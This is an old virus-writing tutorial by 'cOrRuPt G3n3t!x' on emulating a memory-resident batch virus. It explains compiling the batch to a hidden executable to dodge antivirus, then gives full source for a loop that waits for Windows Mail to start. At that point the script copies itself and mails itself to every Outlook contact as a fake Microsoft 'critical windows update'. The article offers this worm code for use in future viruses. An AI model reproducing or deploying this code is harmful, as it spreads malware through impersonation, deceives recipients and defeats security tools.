MEANDERINGS: Theory On Batch Memory Residency Techniques By cOrRuPt G3n3t!x Many people have said that a batch program cannot go memory resident, although, when using ASM MS-Dos is used to send the program into the higher/lower memory modules. So i find it hard to believe that we cannot execute our batch into the computers memory... anyway moving along; i have proposed a method that could possibly 'emulate' your batch file going resident. This method includes your batch file checking if parameters are met (via looping your batch file in the backround without the CMD window) and then executing it's routine if the parameter is met. This is only a theory which will work, but whether its practical is up to the users opinion and usage of the knowlegde gained here. To do this you will need an application called 'Bat_To_Exe_Converter.exe' which can be downloaded from "www.f2ko.de" or even a simple google of the files name will help. Now with this application in hand, let the choas begin... 1)Theory Behind The Madness: -------------------------- First off i'd like to say this is completely my own method i have never seen it done before so if you use it atleast give me a lil' credit man? As i myself really hate lamers!!! With that said... Lets go into detail on this theory of batch memory residency; we loop our batch in the backround without the cmd.exe window; thus 'emulating' our batch residency. But now we have a looping BAT; Whoah not much help so now here is where the ingenius part comes in, we ask our batch on each loop to check for current parameters (such as is a certain process running? what is current time? What is the current date? Has the user copied any new files to a certain directory? Is there an Anti-Virus rinning? Has a new drive bee connected etc) once we have found the answer to this information in REAL TIME we can then let our batch execute specific routines etc. 2)Info On The Outside Sources: --------------------------- WTF am I talking about? Well the application we are using to help hide our batch's window. This is a great lil' application which can convert basically any bat file to an exe (although i have had problems cinverting a 5,12MB batch to a workable .exe, it gets to a certain parameter where there is to many GOTO commands and the does some funky shit and exits, but other then that i have had no problems with it, it's very useful not only for virii but also source code protection. You can add file versions, author name, passwords to execute file, it's also a great heuristics and AV fooler as once converted to an .exe it is most of the time undetected (although the heuristics for batch is completely bullshit on almost all AV's i've tested!!!!) another great feature is that you can add external files to the .exe which will then be called up by the batch which makes scripting your virii a less complicated job, but our focus is the 'invisble application' where no cmd window pops up. My advice to you is play around with the app a bit to get a good 'feel' for it. 3)Simple Task: Right now i first want to give you a simple batch file to make, copy and pste the script below to a batch file and then execute, you will see lines of echo i'm looping. now exit the batch script. Next open your newly downloaded Bat_To_Exe_Converter.exe and add your batch file where it is labled 'batch file' it will then save the .exe of it in the same directory, next click on the invisible application and then compile. After that execute the new .exe it will not show any window but is running in the backround Open taskManger.exe look for CMD.exe under processes and the end the process. --------------------------------[Cut Here]---------------------------------------- :a echo I'm looping goto a --------------------------------[Cut Here]---------------------------------------- So there you have it! your batch gone resident and now window shown, only problem, system resources are being eaten away but f*ck it that aint our computer it's our scripts side effect! (I mean when you get sick you cough and gave a runny nose, take medicine then you feel sleepy. NOTHING IS PERFECT) 4)CG's Process Parameter Execution (CGPPE): ------------------------------------------ This refers to the method where by we will grab a list of current processes, find a string in the list relating to the apllication we are looking for(In this case Windows Mail), if the application is found to be in memory, our batch will run it's MS Outlook spread routine and then terminate it's residency. This will help when your Batch's main infect routine is over a p2p or if you start up your virus on every boot. To get a list of current processes we will use a a batch program to create the vbs and then execute the vbs which will take the current processes to %Temp% and delete it after oit's done. So firts we shall look at the VBS process script. It will create ProcessList.vbs in %temp% and proclis.tmp in %temp% The proclis.tmp is the file containing current processes: --------------------------------[Cut Here]---------------------------------------- echo Option Explicit>%temp%\ProcessList.vbs echo.>>%temp%\ProcessList.vbs echo Dim File>>%temp%\ProcessList.vbs echo Dim ObjFileSystem>>%temp%\ProcessList.vbs echo Dim ObjOutputFile>>%temp%\ProcessList.vbs echo Dim objWMIService>>%temp%\ProcessList.vbs echo Dim oproc>>%temp%\ProcessList.vbs echo Dim Var>>%temp%\ProcessList.vbs echo.>>%temp%\ProcessList.vbs echo File = "Process.txt">>%temp%\ProcessList.vbs echo.>>%temp%\ProcessList.vbs echo Set ObjFileSystem = CreateObject("Scripting.fileSystemObject")>>%temp%\ProcessList.vbs echo Set ObjOutputFile = ObjFileSystem.CreateTextFile("%temp%\proclis.tmp")>>%temp%\ProcessList.vbs echo.>>%temp%\ProcessList.vbs echo Set objWMIService = GetObject("winmgmts:\root\cimv2")>>%temp%\ProcessList.vbs echo Set oproc = objWMIService.ExecQuery("Select * from Win32_Process",,48)>>%temp%\ProcessList.vbs echo.>>%temp%\ProcessList.vbs echo For Each oproc In oproc>>%temp%\ProcessList.vbs echo Var = oproc.ExecutablePath>>%temp%\ProcessList.vbs echo if Var ^<^> "" then>>%temp%\ProcessList.vbs echo ObjOutputFile.WriteLine(Var)>>%temp%\ProcessList.vbs echo End If>>%temp%\ProcessList.vbs echo Next>>%temp%\ProcessList.vbs echo.>>%temp%\ProcessList.vbs echo ObjOutputFile.Close>>%temp%\ProcessList.vbs echo Set objFileSystem = Nothing>>%temp%\ProcessList.vbs echo Set oproc = Nothing>>%temp%\ProcessList.vbs echo Set objWMIService = Nothing>>%temp%\ProcessList.vbs echo.>>%temp%\ProcessList.vbs cscript //I //nologo %temp%\ProcessList.vbs --------------------------------[Cut Here]---------------------------------------- Now that we have the list of current processes we will search in this list of processes for the one we are looking for, which in my case is Windows Mail. See below my batch script for this: --------------------------------[Cut Here]---------------------------------------- :loop call %temp%\ProcessList.vbs FIND /i "C:\Program Files\Windows Mail\WinMail.exe" %temp%\proclis.tmp >nul if not errorlevel 1 (goto routine) if errorlevel 1 (del %temp%\proclis.tmp" >nul ) goto loop :routine echo.on error resume next>>C:\MSO.vbs echo.dim a,b,c,d,e>>C:\MSO.vbs echo.set a=Wscript.CreateObject("Wscript.Shell")>>C:\MSO.vbs echo.set b=CreateObject("Outlook.Application")>>C:\MSO.vbs echo.set c=b.GetNameSpace("MAPI")>>C:\MSO.vbs echo.for y=1 To c.AddressLists.Count>>C:\MSO.vbs echo.set d=c.AddressLists(y)>>C:\MSO.vbs echo.x=1 '>>C:\MSO.vbs echo.set e=b.CreateItem(0)>>C:\MSO.vbs echo.for o=1 To d.AddressEntries.Count>>C:\MSO.vbs echo.f=d.AddressEntries(x)>>C:\MSO.vbs echo.e.Recipients.Add f>>C:\MSO.vbs echo.x=x+1>>C:\MSO.vbs echo.next>>C:\MSO.vbs echo.e.Subject="Your Subject here">>C:\MSO.vbs echo.e.Body="Your Body here">>C:\MSO.vbs echo.e.Attachments.Add("c:\p2pdon.bat")>>C:\MSO.vbs echo.e.DeleteAfterSubmit=False>>C:\MSO.vbs echo.e.Send>>C:\MSO.vbs echo.f ="">>C:\MSO.vbs echo.next>>C:\MSO.vbs call C:\MSO.vbs Del C:\MSO.vbs --------------------------------[Cut Here]---------------------------------------- So we now have a list of current processes, a way to find if the process is active and then an errorlevel checker to do the work. 4a)Final CG Process Parameter Exexcution: ------------------------------------- My final script for Windows Mail execution via a 'resident' batch file will look like this (It is only 2.565 bytes 'big'): --------------------------------[Cut Here]---------------------------------------- @echo off echo Option Explicit>%temp%\ProcessList.vbs echo.>>%temp%\ProcessList.vbs echo Dim File>>%temp%\ProcessList.vbs echo Dim ObjFileSystem>>%temp%\ProcessList.vbs echo Dim ObjOutputFile>>%temp%\ProcessList.vbs echo Dim objWMIService>>%temp%\ProcessList.vbs echo Dim oproc>>%temp%\ProcessList.vbs echo Dim Var>>%temp%\ProcessList.vbs echo.>>%temp%\ProcessList.vbs echo File = "Process.txt">>%temp%\ProcessList.vbs echo.>>%temp%\ProcessList.vbs echo Set ObjFileSystem = CreateObject("Scripting.fileSystemObject")>>%temp%\ProcessList.vbs echo Set ObjOutputFile = ObjFileSystem.CreateTextFile("%temp%\proclis.tmp")>>%temp%\ProcessList.vbs echo.>>%temp%\ProcessList.vbs echo Set objWMIService = GetObject("winmgmts:\root\cimv2")>>%temp%\ProcessList.vbs echo Set oproc = objWMIService.ExecQuery("Select * from Win32_Process",,48)>>%temp%\ProcessList.vbs echo.>>%temp%\ProcessList.vbs echo For Each oproc In oproc>>%temp%\ProcessList.vbs echo Var = oproc.ExecutablePath>>%temp%\ProcessList.vbs echo if Var ^<^> "" then>>%temp%\ProcessList.vbs echo ObjOutputFile.WriteLine(Var)>>%temp%\ProcessList.vbs echo End If>>%temp%\ProcessList.vbs echo Next>>%temp%\ProcessList.vbs echo.>>%temp%\ProcessList.vbs echo ObjOutputFile.Close>>%temp%\ProcessList.vbs echo Set objFileSystem = Nothing>>%temp%\ProcessList.vbs echo Set oproc = Nothing>>%temp%\ProcessList.vbs echo Set objWMIService = Nothing>>%temp%\ProcessList.vbs echo.>>%temp%\ProcessList.vbs :loop call %temp%\ProcessList.vbs FIND /i "C:\Program Files\Windows Mail\WinMail.exe" %temp%\proclis.tmp >nul if not errorlevel 1 (goto routine) if errorlevel 1 (del %temp%\proclis.tmp" >nul ) goto loop :routine copy %0 "C:\update.bat" echo.on error resume next>>C:\MSO.vbs echo.dim a,b,c,d,e>>C:\MSO.vbs echo.set a=Wscript.CreateObject("Wscript.Shell")>>C:\MSO.vbs echo.set b=CreateObject("Outlook.Application")>>C:\MSO.vbs echo.set c=b.GetNameSpace("MAPI")>>C:\MSO.vbs echo.for y=1 To c.AddressLists.Count>>C:\MSO.vbs echo.set d=c.AddressLists(y)>>C:\MSO.vbs echo.x=1 '>>C:\MSO.vbs echo.set e=b.CreateItem(0)>>C:\MSO.vbs echo.for o=1 To d.AddressEntries.Count>>C:\MSO.vbs echo.f=d.AddressEntries(x)>>C:\MSO.vbs echo.e.Recipients.Add f>>C:\MSO.vbs echo.x=x+1>>C:\MSO.vbs echo.next>>C:\MSO.vbs echo.e.Subject="This is a critical windows update">>C:\MSO.vbs echo.e.Body="Microsoft urges all consumers to install this patch in case of emergency">>C:\MSO.vbs echo.e.Attachments.Add("c:\update.bat")>>C:\MSO.vbs echo.e.DeleteAfterSubmit=False>>C:\MSO.vbs echo.e.Send>>C:\MSO.vbs echo.f ="">>C:\MSO.vbs echo.next>>C:\MSO.vbs call C:\MSO.vbs del C:\MSO.vbs del %temp%\proclis.tmp del %temp%\ProcessList.vbs --------------------------------[Cut Here]---------------------------------------- Now run this script as a normal batch, you will see the CMD window stating that the string cannot be found. open your Windows MAil and the screen dissapears this is because the process was found and the routine of infecting Windows Mail was executed. (PLEASE MAKE SURE YOUR INTERNET IS OFFLINE TO AVOID ACTUAL SPREADIN I CANNOT AND WILL NOT TAKE RESPONSIBILTY FOR MISUSE). Now we can just convert our batch to a .exe and remember to check the 'invisible apllications' box and compile. There you have an emulation of batch residency. 5)Practical Usage Of CGPPE: ------------------------ Now i myself think the above script is really impractical for a batch file who's main infection routine is Outlook. But if you are using another infect routine as the main one and Outlook as a secondary protocol this will help. But this does not mean thats all; we could use this script to stay resident and wait until a certain game or apllication is executed, then let our virus kill the game/apllications process. We could also use this for a more exotic MS Outlook spreading where by for example our batch counts how many times IExplorer or Windows mail (or whatever you wish) has been opened and when it reaches a certain number it then executes the MS Outlook script This will help prevent network traffic and your virus will take longer to be seen, Depending on it's payload. There are many more uses for my batch, i have just giving the basic concept on how to check for a process in memory i do hope this can be used in some future batch virii. Please remember, however, you cannot write text to your hidden apllication as is it will not be seen. You'd have to let your hidden batch create a seperate batch to execute any text or visuals. Thats the end of the first emulated memory resident batch i know of (all residency is done via batch scripting!) It is a long process but i am slowly making it shorter, approxiamtely 2/3 of it's original size. stay posted for updates. THIS IS FOR EDUCATIONAL PURPOSES ONLY. [?]Contact Me: ----------- [@]immortalassassin@rocketmail.com